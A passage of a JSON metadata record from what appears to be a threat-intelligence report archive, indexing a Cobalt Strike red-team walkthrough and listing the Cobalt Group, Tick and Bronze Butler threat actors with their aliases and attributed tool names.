	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/"
	],
	"report_names": [
		"cobalt-strike-walkthrough-for-red-teamers"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434021,
	"ts_updated_at": 1775792173,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5be619397f2620f04c1da265d64104913ff07701.pdf",
		"text": "https://archive.orkl.eu/5be619397f2620f04c1da265d64104913ff07701.txt",
		"img": "https://archive.orkl.eu/5be619397f2620f04c1da265d64104913ff07701.jpg"
	}
}